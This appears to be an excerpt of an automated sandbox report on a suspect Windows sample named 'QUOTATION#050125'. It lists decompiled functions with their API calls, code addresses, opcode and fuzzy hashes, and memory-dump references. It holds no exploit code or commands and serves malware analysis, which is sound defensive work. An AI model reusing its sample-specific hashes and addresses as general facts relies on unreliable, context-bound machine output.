                                                                                      • Opcode Fuzzy Hash: 5eb964c868e7ef4b44d24d99f227c9f7ccecbd4d4730c02141b6f6391b0d1d44
                                                                                      • Instruction Fuzzy Hash: E741D431600604AFDB109F24C885BA9BBE9EF45765F148069FD199F2A2D770AD81CBE1
                                                                                      Function 00152DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00152E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00152EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00152EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00152F0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2178440468-0
                                                                                      • Opcode ID: 6f7c54423381fd2a4aa3785af95d3c23092b04b54e0cfdb9fcddc9cb364c9ad1
                                                                                      • Instruction ID: cb3d0e8f9bf0489908b66315e480422ab10c483ba5b40510b4002791d308e958
                                                                                      • Opcode Fuzzy Hash: 6f7c54423381fd2a4aa3785af95d3c23092b04b54e0cfdb9fcddc9cb364c9ad1
                                                                                      • Instruction Fuzzy Hash: F3310332604251EFDB21CF58EC86FA537E1EB9A716F150165F9208F6B1CB71A884DB41
                                                                                      Function 00127726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127769
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0012778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00127792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001277B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 001277B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 001277DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001277EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: 41ab415a23934ea62d3fbc51cd0bbb1f558866b34e078e775e6d3f30a57e19f5
                                                                                      • Instruction ID: 4ddc2cfd5814d5ee38cedaf068ddf658eb88066009213ccb1234a5616badc4ba
                                                                                      • Opcode Fuzzy Hash: 41ab415a23934ea62d3fbc51cd0bbb1f558866b34e078e775e6d3f30a57e19f5
                                                                                      • Instruction Fuzzy Hash: 37219076604329AFDB10EFA8DC88CBB77ACEB097647048425FA15DB291D770DC8187A0
                                                                                      Function 001277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0012786B
                                                                                      • SysAllocString.OLEAUT32 ref: 0012788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00127895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 001278AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001278BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: c3167a55a9b749774fb3d6c57da08b00057290dcc1c3cc0b347f78ac9e309992
                                                                                      • Instruction ID: f2ac9fa84040c262c73329a76ec2b18a8b094b4640c963bbdcdd0ddd77bc8c56
                                                                                      • Opcode Fuzzy Hash: c3167a55a9b749774fb3d6c57da08b00057290dcc1c3cc0b347f78ac9e309992
                                                                                      • Instruction Fuzzy Hash: 17215E35608324EF9B149FA9EC88DBB77ECEB097607108125B915CB2A1EB70DC91CB64
                                                                                      Function 001304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 001304F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0013052E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 26faac6b26199f791f29c9d8a9e43665b73130be0b16de393a48e719232af554
                                                                                      • Instruction ID: a29fdd237d1c634576f10ba25353e571f5e09643214323a0854b3d1db24c47bf
                                                                                      • Opcode Fuzzy Hash: 26faac6b26199f791f29c9d8a9e43665b73130be0b16de393a48e719232af554
                                                                                      • Instruction Fuzzy Hash: A3216975600305EFDB219F29DC54A9A7BE4BF49724F204A19F8A1E72E0E7709980CF60
                                                                                      Function 001305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 001305C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00130601
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 229484b413e76c7b237600f3efc7b1344ec7a4393b7a41b3b59423d1f7bb0d51
                                                                                      • Instruction ID: 155ae74feca98e453800ce45ff7101bff5b3f2ddf1ec756d9bc72578fef147db
                                                                                      • Opcode Fuzzy Hash: 229484b413e76c7b237600f3efc7b1344ec7a4393b7a41b3b59423d1f7bb0d51
                                                                                      • Instruction Fuzzy Hash: 8E21B6B5500305DFDB219F69CC55A9A77E8BF99B30F200B19F8A1E72E4E77099A0CB50
                                                                                      Function 001540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
                                                                                        • Part of subcall function 000C600E: GetStockObject.GDI32(00000011), ref: 000C6060
                                                                                        • Part of subcall function 000C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00154112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0015411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0015412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00154139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00154145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: 44b9338130ac7a3dad3041d40d04b5be3ff0d407451e54c7182dbd6684c95f1d
                                                                                      • Instruction ID: 7fa1a342841da37fea852ef565ae46693d5c9ecf4c18ad3c6412427958ec7553
                                                                                      • Opcode Fuzzy Hash: 44b9338130ac7a3dad3041d40d04b5be3ff0d407451e54c7182dbd6684c95f1d
                                                                                      • Instruction Fuzzy Hash: 8711B2B2140219BFEF119F64CC85EE77F9DEF18798F114111BA28A6190C772DC61DBA4
                                                                                      Function 000E34CD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 0-537541572
                                                                                      • Opcode ID: 133f083dc24ae5d5e43332547e3cbcd34ac794ff1830837c89ea8e0f34002a32
                                                                                      • Instruction ID: 3a7e9ae8791b200823f4e057d04cc086ad83cb8a3408059d05df63db6e48da65
                                                                                      • Opcode Fuzzy Hash: 133f083dc24ae5d5e43332547e3cbcd34ac794ff1830837c89ea8e0f34002a32
                                                                                      • Instruction Fuzzy Hash: 2E11D873E05B91EFDB715B2A9C89A6A7FD49B017A0F150225E915BB391D730EF0085E0
                                                                                      Function 0012DE27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                      • String ID: 0.0.0.0
                                                                                      • API String ID: 348263315-3771769585
                                                                                      • Opcode ID: 3c7a45fb1af44fc18ec9180a76f4307ea18a8d5a1d082cdee1c8ae4d0c9a7ff2
                                                                                      • Instruction ID: 47812cca35bcafcb028ed85f54bf3c3a7e9909d4bf1d161a0f6da0069eb46505
                                                                                      • Opcode Fuzzy Hash: 3c7a45fb1af44fc18ec9180a76f4307ea18a8d5a1d082cdee1c8ae4d0c9a7ff2
                                                                                      • Instruction Fuzzy Hash: 33110A71504315AFDB24AF60FC0ADEE77ACDF15711F020169F445AA092EF718AC18AA0
                                                                                      Function 0012DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0012DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 0012DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0012DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 0012DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0012DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0012DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: acc24c99aee3ace133152996904fa33267099c1f2d02d06dce9d6a52beb15937
                                                                                      • Instruction ID: 78eb0b45c965ffbe37c210bee044b665fd8401d8b5230c93d391a7c72cebb541
                                                                                      • Opcode Fuzzy Hash: acc24c99aee3ace133152996904fa33267099c1f2d02d06dce9d6a52beb15937
                                                                                      • Instruction Fuzzy Hash: 170162F6500318BFE710ABA4ED89EEB326CE708306F404491B706E6041EA749E848FB4
                                                                                      Function 0013096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(00A7F0A0,00A7F0A0), ref: 0013097B
                                                                                      • EnterCriticalSection.KERNEL32(00A7F080,00000000), ref: 0013098D
                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 0013099B
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001309A9
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001309B8
                                                                                      • InterlockedExchange.KERNEL32(00A7F0A0,000001F6), ref: 001309C8
                                                                                      • LeaveCriticalSection.KERNEL32(00A7F080), ref: 001309CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 3983d6e2fac9bc02f441799608a172fcc5c024d38e4ee20712033a7c805944e4
                                                                                      • Instruction ID: 43c5c5f7abc80535bf27e359d93da0cd1bce38b4868b5938310de4cf3721ecae
                                                                                      • Opcode Fuzzy Hash: 3983d6e2fac9bc02f441799608a172fcc5c024d38e4ee20712033a7c805944e4
                                                                                      • Instruction Fuzzy Hash: 2AF0CD31442B12EFD7525F94EE89BDA7A65FF05706F401015F10258CA1CB7594A5CFD0
                                                                                      Function 000C5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 000C5D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C5D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C5D99
                                                                                      • GetClientRect.USER32(?,?), ref: 000C5ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C5EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: bf33e4a210cfdc4ee52079a21212455f98a967e19b1b1d5bd6d4ee396daa081c
                                                                                      • Instruction ID: e54b078a6e1da10e557f958f70b922ac0471bb1e978b059a782feb0031d4abfa
                                                                                      • Opcode Fuzzy Hash: bf33e4a210cfdc4ee52079a21212455f98a967e19b1b1d5bd6d4ee396daa081c
                                                                                      • Instruction Fuzzy Hash: 7BB14C78A0074ADBDB14CFA9C880BEEB7F1BF58311F14841EE999D7250D730AA91DB54
                                                                                      Function 001520FD Relevance: 9.2, APIs: 6, Instructions: 196windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 00152183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 001521B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001521DD
                                                                                      • GetMenuItemID.USER32(?,?), ref: 0015224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 0015225B
                                                                                        • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
                                                                                        • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
                                                                                        • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001522E3
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2039446747-0
                                                                                      • Opcode ID: 0e9885adc8c028dd92bded8f6e63aa9d321a7970215dc517ca0ae18d661d9a4b
                                                                                      • Instruction ID: 936fcd5311247ee3161152232bd2fca4a8e1c0ca32aefea7a3efc42b8a3b7d82
                                                                                      • Opcode Fuzzy Hash: 0e9885adc8c028dd92bded8f6e63aa9d321a7970215dc517ca0ae18d661d9a4b
                                                                                      • Instruction Fuzzy Hash: E8718176A00205EFCB14DF64C885AAEB7F1EF49311F158469E826EF341D774EE458B90
                                                                                      Function 0014BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014BD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0014BD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014BDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014BDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 3451389628-0
                                                                                      • Opcode ID: 33a3ba48cd1aee0274fe9d18acbd6684e56a1b209b434e9dc7ce935bdf1e4f60
                                                                                      • Instruction ID: 93b73353a5ad5b78578e5b75113ca385663f30635170631e707224cc9d04f98f
                                                                                      • Opcode Fuzzy Hash: 33a3ba48cd1aee0274fe9d18acbd6684e56a1b209b434e9dc7ce935bdf1e4f60
                                                                                      • Instruction Fuzzy Hash: 6E815870608241AFD714DF64C8D5E6ABBE5FF84308F14899CF4598B2A2DB32ED45CB92
                                                                                      Function 0011F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 0011F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 0011F860
                                                                                      • VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F889
                                                                                      • VariantClear.OLEAUT32(0011FA64), ref: 0011F8AD
                                                                                      • VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011F8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: 50302d5a4031289d639f990a10ad0c8f2548da661ab531e5428f998f31ebea0b
                                                                                      • Instruction ID: 2992341bb49fbbb7f6dca69eea46391a9ace7a0f05503d457158162ceb60f2be
                                                                                      • Opcode Fuzzy Hash: 50302d5a4031289d639f990a10ad0c8f2548da661ab531e5428f998f31ebea0b
